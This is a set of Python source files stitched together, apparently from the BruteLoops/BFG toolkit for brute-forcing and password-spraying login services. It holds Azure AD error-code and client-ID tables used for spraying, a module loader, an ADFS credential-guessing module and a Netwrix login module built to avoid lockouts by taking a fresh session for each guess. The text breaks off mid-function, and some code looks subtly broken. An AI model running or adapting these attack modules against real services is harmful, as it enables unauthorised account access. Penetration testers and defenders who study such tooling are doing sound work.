                'perform device authentication.',
 'AADSTS50196': 'LoopDetected - A client loop has been detected. Check '
                'the app’s logic to ensure that token caching is '
                'implemented, and that error conditions are handled '
                'correctly.  The app has made too many of the same '
                'request in too short a period, indicating that it is '
                'in a faulty state or is abusively requesting tokens.',
 'AADSTS50197': 'ConflictingIdentities - The user could not be found. '
                'Try signing in again.',
 'AADSTS50199': 'CmsiInterrupt - For security reasons, user '
                'confirmation is required for this request.  Because '
                'this is an "interaction_required" error, the client '
                'should do interactive auth.  This occurs because a '
                'system webview has been used to request a token for a '
                'native application - the user must be prompted to ask '
                'if this was actually the app they meant to sign into. '
                'To avoid this prompt, the redirect URI should be part '
                'of the following safe list: '
                'http://https://msauth://(iOS only)msauthv2://(iOS '
                'only)chrome-extension:// (desktop Chrome browser '
                'only)',
 'AADSTS51000': 'RequiredFeatureNotEnabled - The feature is disabled.',
 'AADSTS51001': 'DomainHintMustbePresent - Domain hint must be present '
                'with on-premises security identifier or on-premises '
                'UPN.',
 'AADSTS51004': 'UserAccountNotInDirectory - The user account doesn’t '
                'exist in the directory.',
 'AADSTS51005': 'TemporaryRedirect - Equivalent to HTTP status 307, '
                'which indicates that the requested information is '
                'located at the URI specified in the location header. '
                'When you receive this status, follow the location '
                'header associated with the response. When the '
                'original request method was POST, the redirected '
                'request will also use the POST method.',
 'AADSTS51006': 'ForceReauthDueToInsufficientAuth - Integrated Windows '
                'authentication is needed. User logged in using a '
                'session token that is missing the Integrated Windows '
                'authentication claim. Request the  user to log in '
                'again.',
 'AADSTS52004': 'DelegationDoesNotExistForLinkedIn - The user has not '
                'provided consent for access to LinkedIn resources.',
 'AADSTS53000': 'DeviceNotCompliant - Conditional Access policy '
                'requires a compliant device, and the device is not '
                'compliant. The user must enroll their device with an '
                'approved MDM provider like Intune.',
 'AADSTS53001': 'DeviceNotDomainJoined - Conditional Access policy '
                'requires a domain joined device, and the device is '
                'not domain joined. Have the user use a domain joined '
                'device.',
 'AADSTS53002': 'ApplicationUsedIsNotAnApprovedApp - The app used is '
                'not an approved app for Conditional Access. User '
                'needs to use one of the apps from the list of '
                'approved apps to use in order to get access.',
 'AADSTS53003': 'BlockedByConditionalAccess - Access has been blocked '
                'by Conditional Access policies. The access policy '
                'does not allow token issuance.',
 'AADSTS530032': 'BlockedByConditionalAccessOnSecurityPolicy - The '
                 'tenant admin has configured a security policy that '
                 'blocks this request. Check the security policies '
                 'that are defined on the tenant level to determine if '
                 'your request meets the policy requirements.',
 'AADSTS53004': 'ProofUpBlockedDueToRisk - User needs to complete the '
                'multi-factor authentication registration process '
                'before accessing this content. User should register '
                'for multi-factor authentication.',
 'AADSTS54000': 'MinorUserBlockedLegalAgeGroupRule',
 'AADSTS65001': 'DelegationDoesNotExist - The user or administrator '
                'has not consented to use the application with ID X. '
                'Send an interactive authorization request for this '
                'user and resource.',
 'AADSTS65004': 'UserDeclinedConsent - User declined to consent to '
                'access the app. Have the user retry the sign-in and '
                'consent to the app',
 'AADSTS65005': 'MisconfiguredApplication - The app required resource '
                'access list does not contain apps discoverable by the '
                'resource or The client app has requested access to '
                'resource, which was not specified in its required '
                'resource access list or Graph service returned bad '
                'request or resource not found. If the app supports '
                'SAML, you may have configured the app with the wrong '
                'Identifier (Entity). Try out the resolution listed '
                'for SAML using the link below: '
                'https://docs.microsoft.com/azure/active-directory/application-sign-in-problem-federated-sso-gallery#no-resource-in-requiredresourceaccess-list',
 'AADSTS650052': 'The app needs access to a service ("{name}") that '
                 'your organization "{organization}" has not '
                 'subscribed to or enabled. Contact your IT Admin to '
                 'review the configuration of your service '
                 'subscriptions.',
 'AADSTS67003': 'ActorNotValidServiceIdentity',
 'AADSTS70000': 'InvalidGrant - Authentication failed. The refresh '
                'token is not valid. Error may be due to the following '
                'reasons:Token binding header is emptyToken binding '
                'hash does not match',
 'AADSTS700005': 'InvalidGrantRedeemAgainstWrongTenant - Provided '
                 'Authorization Code is intended to use against other '
                 'tenant, thus rejected. OAuth2 Authorization Code '
                 'must be redeemed against same tenant it was acquired '
                 'for (/common or /{tenant-ID} as appropriate)',
 'AADSTS70001': 'UnauthorizedClient - The application is disabled.',
 'AADSTS7000112': 'UnauthorizedClientApplicationDisabled - The '
                  'application is disabled.',
 'AADSTS700016': 'UnauthorizedClient_DoesNotMatchRequest - The '
                 "application wasn't found in the directory/tenant. "
                 'This can happen if the application has not been '
                 'installed by the administrator of the tenant or '
                 'consented to by any user in the tenant. You might '
                 'have misconfigured the identifier value for the '
                 'application or sent your authentication request to '
                 'the wrong tenant.',
 'AADSTS70002': 'InvalidClient - Error validating the credentials. The '
                'specified client_secret does not match the expected '
                'value for this client. Correct the client_secret and '
                'try again. For more info, see Use the authorization '
                'code to request an access token.',
 'AADSTS700020': 'InteractionRequired - The access grant requires '
                 'interaction.',
 'AADSTS7000215': 'Invalid client secret is provided. Developer error '
                  '- the app is attempting to sign in without the '
                  'necessary or correct authentication parameters.',
 'AADSTS700022': 'InvalidMultipleResourcesScope - The provided value '
                 "for the input parameter scope isn't valid because it "
                 'contains more than one resource.',
 'AADSTS7000222': 'InvalidClientSecretExpiredKeysProvided - The '
                  'provided client secret keys are expired. Visit the '
                  'Azure portal to create new keys for your app, or '
                  'consider using certificate credentials for added '
                  'security: https://aka.ms/certCreds',
 'AADSTS700023': 'InvalidResourcelessScope - The provided value for '
                 "the input parameter scope isn't valid when request "
                 'an access token.',
 'AADSTS70003': 'UnsupportedGrantType - The app returned an '
                'unsupported grant type.',
 'AADSTS70004': 'InvalidRedirectUri - The app returned an invalid '
                'redirect URI. The redirect address specified by the '
                'client does not match any configured addresses or any '
                'addresses on the OIDC approve list.',
 'AADSTS70005': 'UnsupportedResponseType - The app returned an '
                'unsupported response type due to the following '
                "reasons:response type 'token' is not enabled for the "
                "appresponse type 'id_token' requires the 'OpenID' "
                'scope -contains an unsupported OAuth parameter value '
                'in the encoded wctx',
 'AADSTS70007': 'UnsupportedResponseMode - The app returned an '
                'unsupported value of response_mode when requesting a '
                'token.',
 'AADSTS70008': 'ExpiredOrRevokedGrant - The refresh token has expired '
                'due to inactivity. The token was issued on XXX and '
                'was inactive for a certain amount of time.',
 'AADSTS70011': 'InvalidScope - The scope requested by the app is '
                'invalid.',
 'AADSTS70012': 'MsaServerError - A server error occurred while '
                'authenticating an MSA (consumer) user. Try again. If '
                'it continues to fail, open a support ticket ',
 'AADSTS70016': 'AuthorizationPending - OAuth 2.0 device flow error. '
                'Authorization is pending. The device will retry '
                'polling the request.',
 'AADSTS70018': 'BadVerificationCode - Invalid verification code due '
                'to User typing in wrong user code for device code '
                'flow. Authorization is not approved.',
 'AADSTS70019': 'CodeExpired - Verification code expired. Have the '
                'user retry the sign-in.',
 'AADSTS75001': 'BindingSerializationError - An error occurred during '
                'SAML message binding.',
 'AADSTS75003': 'UnsupportedBindingError - The app returned an error '
                'related to unsupported binding (SAML protocol '
                'response cannot be sent via bindings other than HTTP '
                'POST).',
 'AADSTS75005': 'Saml2MessageInvalid - Azure AD doesn’t support the '
                'SAML request sent by the app for SSO.',
 'AADSTS7500514': 'A supported type of SAML response was not found. '
                  "The supported response types are 'Response' (in XML "
                  "namespace 'urn:oasis:names:tc:SAML:2.0:protocol') "
                  "or 'Assertion' (in XML namespace "
                  "'urn:oasis:names:tc:SAML:2.0:assertion'). "
                  'Application error - the developer will handle this '
                  'error.',
 'AADSTS7500529': 'The value ‘SAMLId-Guid’ is not a valid SAML ID - '
                  'Azure AD uses this attribute to populate the '
                  'InResponseTo attribute of the returned response. ID '
                  'must not begin with a number, so a common strategy '
                  'is to prepend a string like "id" to the string '
                  'representation of a GUID. For example, '
                  'id6c1c178c166d486687be4aaf5e482730 is a valid ID.',
 'AADSTS75008': 'RequestDeniedError - The request from the app was '
                'denied since the SAML request had an unexpected '
                'destination.',
 'AADSTS75011': 'NoMatchedAuthnContextInOutputClaims - The '
                'authentication method by which the user authenticated '
                "with the service doesn't match requested "
                'authentication method.',
 'AADSTS75016': 'Saml2AuthenticationRequestInvalidNameIDPolicy - SAML2 '
                'Authentication Request has invalid NameIdPolicy.',
 'AADSTS80001': 'OnPremiseStoreIsNotAvailable - The Authentication '
                'Agent is unable to connect to Active Directory. Make '
                'sure that agent servers are members of the same AD '
                'forest as the users whose passwords need to be '
                'validated and they are able to connect to Active '
                'Directory.',
 'AADSTS80002': 'OnPremisePasswordValidatorRequestTimedout - Password '
                'validation request timed out. Make sure that Active '
                'Directory is available and responding to requests '
                'from the agents.',
 'AADSTS80005': 'OnPremisePasswordValidatorUnpredictableWebException - '
                'An unknown error occurred while processing the '
                'response from the Authentication Agent. Retry the '
                'request. If it continues to fail, open a support '
                'ticket to get more details on the error.',
 'AADSTS80007': 'OnPremisePasswordValidatorErrorOccurredOnPrem - The '
                "Authentication Agent is unable to validate user's "
                'password. Check the agent logs for more info and '
                'verify that Active Directory is operating as '
                'expected.',
 'AADSTS80010': 'OnPremisePasswordValidationEncryptionException - The '
                'Authentication Agent is unable to decrypt password.',
 'AADSTS80012': 'OnPremisePasswordValidationAccountLogonInvalidHours - '
                'The users attempted to log on outside of the allowed '
                'hours (this is specified in AD).',
 'AADSTS80013': 'OnPremisePasswordValidationTimeSkew - The '
                'authentication attempt could not be completed due to '
                'time skew between the machine running the '
                'authentication agent and AD. Fix time sync issues.',
 'AADSTS81004': 'DesktopSsoIdentityInTicketIsNotAuthenticated - '
                'Kerberos authentication attempt failed.',
 'AADSTS81005': 'DesktopSsoAuthenticationPackageNotSupported - The '
                'authentication package is not supported.',
 'AADSTS81006': 'DesktopSsoNoAuthorizationHeader - No authorization '
                'header was found.',
 'AADSTS81007': 'DesktopSsoTenantIsNotOptIn - The tenant is not '
                'enabled for Seamless SSO.',
 'AADSTS81009': 'DesktopSsoAuthorizationHeaderValueWithBadFormat - '
                "Unable to validate user's Kerberos ticket.",
 'AADSTS81010': 'DesktopSsoAuthTokenInvalid - Seamless SSO failed '
                "because the user's Kerberos ticket has expired or is "
                'invalid.',
 'AADSTS81011': 'DesktopSsoLookupUserBySidFailed - Unable to find user '
                "object based on information in the user's Kerberos "
                'ticket.',
 'AADSTS81012': 'DesktopSsoMismatchBetweenTokenUpnAndChosenUpn - The '
                'user trying to sign in to Azure AD is different from '
                'the user signed into the device.',
 'AADSTS90002': "InvalidTenantName - The tenant name wasn't found in "
                'the data store. Check to make sure you have the '
                'correct tenant ID.',
 'AADSTS90004': 'InvalidRequestFormat - The request is not properly '
                'formatted.',
 'AADSTS90005': 'InvalidRequestWithMultipleRequirements - Unable to '
                'complete the request. The request is not valid '
                "because the identifier and login hint can't be used "
                'together.',
 'AADSTS90006': 'ExternalServerRetryableError - The service is '
                'temporarily unavailable.',
 'AADSTS90007': 'InvalidSessionId - Bad request. The passed session ID '
                "can't be parsed.",
 'AADSTS90008': 'TokenForItselfRequiresGraphPermission - The user or '
                "administrator hasn't consented to use the "
                'application. At the minimum, the application requires '
                'access to Azure AD by specifying the sign-in and read '
                'user profile permission.',
 'AADSTS90009': 'TokenForItselfMissingIdenticalAppIdentifier - The '
                'application is requesting a token for itself. This '
                "scenario is supported only if the resource that's "
                'specified is using the GUID-based application ID.',
 'AADSTS90010': 'NotSupported - Unable to create the algorithm.',
 'AADSTS90012': 'RequestTimeout - The requested has timed out.',
 'AADSTS90013': 'InvalidUserInput - The input from the user is not '
                'valid.',
 'AADSTS90014': 'MissingRequiredField - This error code may appear in '
                'various cases when an expected field is not present '
                'in the credential.',
 'AADSTS90015': 'QueryStringTooLong - The query string is too long.',
 'AADSTS90016': "MissingRequiredClaim - The access token isn't valid. "
                'The required claim is missing.',
 'AADSTS90019': 'MissingTenantRealm - Azure AD was unable to determine '
                'the tenant identifier from the request.',
 'AADSTS90022': 'AuthenticatedInvalidPrincipalNameFormat - The '
                'principal name format is not valid, or does not meet '
                'the expected name[/host][@realm] format. The '
                'principal name is required, host and realm are '
                'optional and may be set to null.',
 'AADSTS90023': 'InvalidRequest - The authentication service request '
                'is not valid.',
 'AADSTS9002313': 'InvalidRequest - Request is malformed or invalid. - '
                  'The issue here is because there was something wrong '
                  'with the request to a certain endpoint. The '
                  'suggestion to this issue is to get a fiddler trace '
                  'of the error occurring and looking to see if the '
                  'request is actually properly formatted or not.',
 'AADSTS90024': 'RequestBudgetExceededError - A transient error has '
                'occurred. Try again.',
 'AADSTS90033': 'MsodsServiceUnavailable - The Microsoft Online '
                'Directory Service (MSODS) is not available.',
 'AADSTS90036': 'MsodsServiceUnretryableFailure - An unexpected, '
                'non-retryable error from the WCF service hosted by '
                'MSODS has occurred. Open a support ticket to get more '
                'details on the error.',
 'AADSTS90038': 'NationalCloudTenantRedirection - The specified tenant '
                "'Y' belongs to the National Cloud 'X'. Current cloud "
                "instance 'Z' does not federate with X. A cloud "
                'redirect error is returned.',
 'AADSTS900382': 'Confidential Client is not supported in Cross Cloud '
                 'request.',
 'AADSTS90043': 'NationalCloudAuthCodeRedirection - The feature is '
                'disabled.',
 'AADSTS90051': 'InvalidNationalCloudId - The national cloud '
                'identifier contains an invalid cloud identifier.',
 'AADSTS90055': 'TenantThrottlingError - There are too many incoming '
                'requests. This exception is thrown for blocked '
                'tenants.',
 'AADSTS90056': 'BadResourceRequest - To redeem the code for an access '
                'token, the app should send a POST request to the '
                '/token endpoint. Also, prior to this, you should '
                'provide an authorization code and send it in the POST '
                'request to the /token endpoint. Refer to this article '
                'for an overview of OAuth 2.0 authorization code flow: '
                '../azuread-dev/v1-protocols-oauth-code.md. Direct the '
                'user to the /authorize endpoint, which will return an '
                'authorization_code. By posting a request to the '
                '/token endpoint, the user gets the access token. Log '
                'in the Azure portal, and check App registrations > '
                'Endpoints to confirm that the two endpoints were '
                'configured correctly.',
 'AADSTS90072': 'PassThroughUserMfaError - The external account that '
                "the user signs in with doesn't exist on the tenant "
                "that they signed into; so the user can't satisfy the "
                'MFA requirements for the tenant. The account must be '
                'added as an external user in the tenant first. Sign '
                'out and sign in with a different Azure AD user '
                'account.',
 'AADSTS90081': 'OrgIdWsFederationMessageInvalid - An error occurred '
                'when the service tried to process a WS-Federation '
                'message. The message is not valid.',
 'AADSTS90082': 'OrgIdWsFederationNotSupported - The selected '
                "authentication policy for the request isn't currently "
                'supported.',
 'AADSTS90084': 'OrgIdWsFederationGuestNotAllowed - Guest accounts '
                "aren't allowed for this site.",
 'AADSTS90085': 'OrgIdWsFederationSltRedemptionFailed - The service is '
                'unable to issue a token because the company object '
                "hasn't been provisioned yet.",
 'AADSTS90086': 'OrgIdWsTrustDaTokenExpired - The user DA token is '
                'expired.',
 'AADSTS90087': 'OrgIdWsFederationMessageCreationFromUriFailed - An '
                'error occurred while creating the WS-Federation '
                'message from the URI.',
 'AADSTS90090': 'GraphRetryableError - The service is temporarily '
                'unavailable.',
 'AADSTS90091': 'GraphServiceUnreachable',
 'AADSTS90092': 'GraphNonRetryableError',
 'AADSTS90093': 'GraphUserUnauthorized - Graph returned with a '
                'forbidden error code for the request.',
 'AADSTS90094': 'AdminConsentRequired - Administrator consent is '
                'required.',
 'AADSTS90099': "The application '{appId}' ({appName}) has not been "
                "authorized in the tenant '{tenant}'. Applications "
                'must be authorized to access the customer tenant '
                'before partner delegated administrators can use them. '
                'Provide pre-consent or execute the appropriate '
                'Partner Center API to authorize the application.',
 'AADSTS90100': 'InvalidRequestParameter - The parameter is empty or '
                'not valid.',
 'AADSTS901002': "AADSTS901002: The 'resource' request parameter is "
                 'not supported.',
 'AADSTS90101': "InvalidEmailAddress - The supplied data isn't a valid "
                'email address. The email address must be in the '
                'format someone@example.com.',
 'AADSTS90102': 'InvalidUriParameter - The value must be a valid '
                'absolute URI.',
 'AADSTS90107': 'InvalidXml - The request is not valid. Make sure your '
                "data doesn't have invalid characters.",
 'AADSTS90114': 'InvalidExpiryDate - The bulk token expiration '
                'timestamp will cause an expired token to be issued.',
 'AADSTS90117': 'InvalidRequestInput',
 'AADSTS90119': 'InvalidUserCode - The user code is null or empty.',
 'AADSTS90120': 'InvalidDeviceFlowRequest - The request was already '
                'authorized or declined.',
 'AADSTS90121': 'InvalidEmptyRequest - Invalid empty request.',
 'AADSTS90123': "IdentityProviderAccessDenied - The token can't be "
                'issued because the identity or claim issuance '
                'provider denied the request.',
 'AADSTS90124': 'V1ResourceV2GlobalEndpointNotSupported - The resource '
                'is not supported over the /common or /consumers '
                'endpoints. Use the /organizations or tenant-specific '
                'endpoint instead.',
 'AADSTS90125': "DebugModeEnrollTenantNotFound - The user isn't in the "
                'system. Make sure you entered the user name '
                'correctly.',
 'AADSTS90126': 'DebugModeEnrollTenantNotInferred - The user type is '
                "not supported on this endpoint. The system can't "
                "infer the user's tenant from the user name.",
 'AADSTS90130': 'NonConvergedAppV2GlobalEndpointNotSupported - The '
                'application is not supported over the /common or '
                '/consumers endpoints. Use the /organizations or '
                'tenant-specific endpoint instead.'}

# Client ID Source: https://github.com/Gerenios/AADInternals/blob/master/AccessToken_utils.ps1#L11
# Parsed Structure: {client:{tag:ID}}

COMMON_CLIENT_IDS = CIDS = \
{'aad_account': {'https://account.activedirectory.windowsazure.com': ['0000000c-0000-0000-c000-000000000000']},
 'aadconnectv2': {'AADConnectv2': ['6eb59a73-39b2-4c23-a70f-e2e3ce8965b1']},
 'aadrm': {'AADRM': ['90f610bf-206d-4950-b61d-37fa6fd1b224']},
 'aadsync': {'AzureADSync': ['cb1056e2-e479-49de-ae31-7812af012ed8']},
 'az': {'AADJCSP': ['b90d5b8f-5503-4153-b545-b31cecfaece2'],
        'AADPinredemptionclient': ['06c6433f-4fb8-4670-b2cd-408938296b8e'],
        'AZPowerShellModule': ['1950a258-227b-4e31-a9cf-717495945fc2'],
        'AppleInternetAccounts': ['f8d98a96-0999-43f5-8af3-69971c7bb423'],
        'AuthenticatorAppresource:ff9ebd75-fe62-434a-a6ce-b3f0a8592eaf': ['4813382a-8fa7-425e-ab75-3b753aab3abb'],
        'AzureAndroidApp': ['0c1307d4-29d6-4389-a11c-5cbe7f65d7fa'],
        'IntuneMAMclientresource:https://intunemam.microsoftonline.com': ['6c7e8096-f593-4d72-807f-a5f86dcc9c77'],
        'Microsoft.AAD.BrokerPluginresource:https://cs.dds.microsoft.com': ['6f7e0f60-9401-4f5b-98e2-cf15bd5fd5e3'],
        'MicrosoftAADCloudAP': ['38aa3b87-a06d-4817-b275-7a316988d93b'],
        'MicrosoftAuthenticationBroker(AzureMDMclient)': ['29d9ed98-a469-4536-ade2-f981bc1d605e'],
        'MicrosoftExchangeRESTAPIBasedPowershell': ['fb78d390-0c51-40cd-8e17-fdbfab77341b'],
        'Microsoft_AAD_RegisteredApps': ['18ed3507-a475-4ccb-b669-d66bc9f2a36e'],
        'Office365Management(mobileapp)': ['00b41c95-dab0-4487-9791-b9d2c32c80f2'],
        'SPOManagementShell': ['9bc3ab49-b65d-410a-85ad-de819febfddc'],
        'Teamsclient': ['1fec8e78-bce4-4aaf-ab1b-5451cc387264'],
        'WindowsConfigurationDesigner(WCD)': ['de0853a1-ab20-47bd-990b-71ad5077ac7b'],
        'code-try-0': ['7f59a773-2eaf-429c-a059-50fc5bb28b44'],
        'https://mysignins.microsoft.com': ['19db86c3-b2b9-44cc-b339-36da233a3be2']},
 'azure_mgmt': {'WindowsAzureServiceManagementAPI': ['84070985-06ea-473d-82fe-eb82b4011c9d']},
 'azureadmin': {'AzureAdminwebui': ['c44b4083-3bb0-49c1-b47d-974e53cbdf3c']},
 'azuregraphclientint': {'MicrosoftAzureGraphClientLibrary2.1.9Internal': ['7492bca1-9461-4d94-8eb8-c17896c61205']},
 'dynamicscrm': {'DynamicsCRM': ['00000007-0000-0000-c000-000000000000']},
 'exo': {'EXORemotePowerShell': ['a0c73c16-a7e3-4564-9a95-2bdf47383716']},
 'graph_api': {'MSGraphAPI': ['1b730954-1685-4b74-9bfd-dac224a7b894']},
 'msmamservice': {'MSMAMServiceAPI': ['27922004-5251-4030-b22d-91ecd9a37ea4']},
 'o365exo': {'ExchangeOnline': ['00000002-0000-0ff1-ce00-000000000000']},
 'o365spo': {'SharePointOnline': ['00000003-0000-0ff1-ce00-000000000000']},
 'o365suiteux': {'O365SuiteUX': ['4345a7b9-9a63-4910-a426-35363201d503']},
 'office': {'Office,ref.https://docs.microsoft.com/en-us/office/dev/add-ins/develop/register-sso-add-in-aad-v2': ['d3590ed6-52b3-4102-aeff-aad2292ab01c']},
 'office_mgmt': {'OfficeManagementAPIEditorhttps://manage.office.com': ['389b1b32-b5d5-43b2-bddc-84ce938d6737']},
 'office_online': {'OutlookOnlineAdd-inApp': ['bc59ab01-8403-45c6-8796-ac3ef710b3e3']},
 'office_online2': {'SharePointOnlineClient': ['57fb890c-0dab-4253-a5e0-7188c88b2bb4']},
 'onedrive': {'OneDriveSyncEngine': ['ab9b8c07-8f02-4f72-87fa-80105867a763']},
 'patnerdashboard': {'Partnerdashboard(missingonletter?)': ['4990cffe-04e8-4e8b-808a-1175604b879']},
 'powerbi_contentpack': {'PowerBIcontentpack': ['2a0c3efa-ba54-4e55-bdc0-770f9e39e9ee']},
 'pta': {'Pass-throughauthentication': ['cb1056e2-e479-49de-ae31-7812af012ed8']},
 'sara': {'MicrosoftSupportandRecoveryAssistant(SARA)': ['d3590ed6-52b3-4102-aeff-aad2292ab01c']},
 'skype': {'Skype': ['d924a533-3729-4708-b3e8-1d2445af35e3']},
 'synccli': {'Syncclient': ['1651564e-7ce4-4d99-88be-0a65050d8dc3']},
 'teams': {'Teams': ['1fec8e78-bce4-4aaf-ab1b-5451cc387264']},
 'teamswebclient': {'Teamswebclient': ['5e3ce6c0-2b1f-4285-8d4b-75ee78787346']},
 'webshellsuite': {'Office365ShellWCSS-Client': ['89bee1f7-5e6e-4d8a-9f3d-ecd601259da7']},
 'www': {'Officeportal': ['00000006-0000-0ff1-ce00-000000000000']}}

RESOURCES = \
{'aad_graph_api': 'https://graph.windows.net',
 'ms_graph_api': 'https://graph.microsoft.com',
 'azure_mgmt_api': 'https://management.azure.com',
 'windows_net_mgmt_api': 'https://management.core.windows.net/',
 'cloudwebappproxy': 'https://proxy.cloudwebappproxy.net/registerapp',
 'officeapps': 'https://officeapps.live.com',
 'outlook': 'https://outlook.office365.com',
 'webshellsuite': 'https://webshell.suite.office.com',
 'sara': 'https://api.diagnostics.office.com',
 'office_mgmt': 'https://manage.office.com',
 'msmamservice': 'https://msmamservice.api.application',
 'spacesapi': 'https://api.spaces.skype.com'}

# ==============================================
# CLIENT IDS KNOWN TO WORK WITH ANY RESOURCE URL
# ==============================================

MSOL_UNIVERSAL_CLIENT_IDS = \
['1b730954-1685-4b74-9bfd-dac224a7b894', 
  '90f610bf-206d-4950-b61d-37fa6fd1b224',
  'a0c73c16-a7e3-4564-9a95-2bdf47383716',
  'd924a533-3729-4708-b3e8-1d2445af35e3',
  '00000006-0000-0ff1-ce00-000000000000',
  '00000003-0000-0ff1-ce00-000000000000',
  '00000002-0000-0ff1-ce00-000000000000',
  '00000007-0000-0000-c000-000000000000',
  '4345a7b9-9a63-4910-a426-35363201d503',
  'cb1056e2-e479-49de-ae31-7812af012ed8',
  'c44b4083-3bb0-49c1-b47d-974e53cbdf3c',
  'cb1056e2-e479-49de-ae31-7812af012ed8',
  '89bee1f7-5e6e-4d8a-9f3d-ecd601259da7',
  '1fec8e78-bce4-4aaf-ab1b-5451cc387264',
  'd3590ed6-52b3-4102-aeff-aad2292ab01c',
  '57fb890c-0dab-4253-a5e0-7188c88b2bb4',
  'bc59ab01-8403-45c6-8796-ac3ef710b3e3',
  '2a0c3efa-ba54-4e55-bdc0-770f9e39e9ee',
  '0000000c-0000-0000-c000-000000000000',
  'd3590ed6-52b3-4102-aeff-aad2292ab01c',
  '389b1b32-b5d5-43b2-bddc-84ce938d6737',
  'ab9b8c07-8f02-4f72-87fa-80105867a763',
  '27922004-5251-4030-b22d-91ecd9a37ea4',
  '5e3ce6c0-2b1f-4285-8d4b-75ee78787346',
  '1950a258-227b-4e31-a9cf-717495945fc2',
  'f8d98a96-0999-43f5-8af3-69971c7bb423',
  '7f59a773-2eaf-429c-a059-50fc5bb28b44',
  '9bc3ab49-b65d-410a-85ad-de819febfddc',
  '19db86c3-b2b9-44cc-b339-36da233a3be2',
  '00b41c95-dab0-4487-9791-b9d2c32c80f2',
  '29d9ed98-a469-4536-ade2-f981bc1d605e',
  '6f7e0f60-9401-4f5b-98e2-cf15bd5fd5e3',
  '0c1307d4-29d6-4389-a11c-5cbe7f65d7fa',
  '6c7e8096-f593-4d72-807f-a5f86dcc9c77',
  '4813382a-8fa7-425e-ab75-3b753aab3abb',
  '1fec8e78-bce4-4aaf-ab1b-5451cc387264',
  'de0853a1-ab20-47bd-990b-71ad5077ac7b',
  'b90d5b8f-5503-4153-b545-b31cecfaece2',
  'fb78d390-0c51-40cd-8e17-fdbfab77341b',
  '18ed3507-a475-4ccb-b669-d66bc9f2a36e']



from bruteloops.args import *
from pathlib import Path
from importlib.util import spec_from_file_location, module_from_spec
from importlib import import_module
import inspect

# Get the base modules directory
base=Path(Path(inspect.getfile(inspect.currentframe())).parent \
        .absolute().__str__()+'/modules')

# Enumerate each valid module file to import
files = sorted([
    f for f in base.glob('**/*.py')
    if f.is_file() and not f.name.startswith('_')
])

# Initialize an argument parser object
parser = argparse.ArgumentParser(
        description='Example program that makes use of BruteLoops. ' \
                'Select a brute force module and input database to ' \
                'perform a highly configurable brute force attack a'
                'gainst a target service.',
        parents=[gp,jp,op],
        add_help=False)

# Initialize the subparsers object
subparsers = parser.add_subparsers(title='Brute Force Modules',
        help='Brute Modules Help',
        description='Select a brute force module below. Pass the ' \
                '--help flag to the module to get help related to' \
                ' module-level parameters.')

# ===========================
# LOAD MODULES AS SUBCOMMANDS
# ===========================

for f in files:

    try:

        # Create the name for the module and subcommand
        name = '.'.join(str(f.absolute()).split('/')[-3:]).strip('.py')

        # Import the module
        module = import_module('bfg.modules.'+name)

        # Validate the module and build the interface components
        module.Module.validate()
        module.Module.build_interface(subparsers)

    except Exception as e:

        # =============================
        # CLEANLY HANDLE FAILED MODULES
        # =============================

        print(
            'Failed to load module: {file}\n'
            'Reason:\n\n{error}\n\n'.format(
                file=f,
                error=e))



import requests
from bfg.module import Module as BModule
from bfg.shortcuts.http import Module,HTTPModule
from logging import getLogger,INFO
from time import sleep

getLogger('urllib3.connectionpool').setLevel(INFO)

class Module(HTTPModule):

    brief_description = 'Active Directory Federated Services'

    description = ('Brute force an ADFS server. NOTE: this module has '
    'not been thoroughly tested and is crude. It effectively '
    'takes a base URL, and just updates the POST body with the supppl'
    'ied credentials. It may not work on all ADFS versions.')

    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __call__(self, username, password, *args, **kwargs):
        '''Make the module callable.

        During testing it appeared as though valid credentials always
        resulted in a 302 redirect, so that's what we test for in the
        logic below.
        '''

        # Craft the payload
        payload = {
            'UserName':username,
            'Password':password,
            'AuthMethod':'FormsAuthentication',
        }
        
        try:

            # Make the request while ignoring redirects
            resp = requests.post(
                **self.request_args,
                data=payload)

        except requests.exceptions.ConnectionError:
            # ADFS appears to fall over on occasion
            # Sleep for a few moments, then try again

            sleep(5)
            resp = requests.post(
                self.url,
                data=payload,
                proxies=self.proxies,
                headers=self.headers,
                allow_redirects=False)

        # Credentials should be valid on a 302 redirect
        if resp.status_code == 302:
            valid = 1
        else:
            valid = 0

        # Return the outcome
        return dict(
                outcome=valid,
                username=username,
                password=password,
                events=[])




#!/usr/bin/env python3

import requests
import re
import warnings
import pdb
from bfg.args import http as http_args, argument
from bfg.shortcuts.http import HTTPModule, handleUA

warnings.filterwarnings('ignore')

# Default user agent
DEFAULT_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' \
             'AppleWebKit/537.36 (KHTML, like Gecko) Chr' \
             'ome/58.0.3029.110 Safari/537.36'

# Path to default landing page
#   - Assigns CRSF cookie
#   - Provides value to fc POST parameter (unknown use)
DEFAULT_LANDING = '/PM/default.asp'

# Path to where the form is posted
DEFAULT_LOGIN   = '/PM/enroll_verify.asp'

@argument
def domain(name_or_flags=('--domain',),type=str, required=True,
        help='Domain value.'):
    pass

@argument
def landing_path(name_or_flags=('--landing-path',),
        default=DEFAULT_LANDING,
        help='String path to the landing page that issues '
            'cookies/tokens.'):
    pass

@argument
def login_path(name_or_flags=('--login-path',), default=DEFAULT_LOGIN,
        help='String path to where the authentication form '
            'is to be submitted.'):
    pass

class Module(HTTPModule):

    description = brief_description = 'Netwrix web login'

    args = [http_args.url(), domain(), landing_path(), login_path()] + \
            http_args.getDefaults('url', invert=True)

    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __post_init__(self, domain, landing_path, login_path,
            *args, **kwargs):

        self.url=self.url
        self.domain=domain
        self.landing_path=landing_path
        self.login_path=login_path
        self.landing_url=f'{url}{landing_path}'
        self.auth_url=f'{url}{login_path}'

    @handleUA
    def __call__(self,username,password):
        '''Authentication module called for each set of credentials.
        It uses a fresh `requests.Session` object to acquire a new
        session cookie and fc value from the landing page to assure
        that server-side logic doesn't denylist a given combination of
        values due to multiple failed authentication attempts.

        - username - String username value to guess
        - password - String password value to guess
        '''

        # ====================
        # GET NECESSARY VALUES
        # ====================

        sess = requests.Session()

        # Get a CSRF-TOKEN (cookie)
        resp = sess.get(self.landing_url,
                headers=self.headers,
                verify_ssl=self.verify_ssl)

        if resp.status_code != 200:
            raise Exception(
                    f'Server responded with non 200: {resp.status_code}')

        # ======================
        # ATTEMPT AUTHENTICATION
        # ======================

        data={"user_name":username,"password":password,"x":0,"y":0,"domain":self.domain}

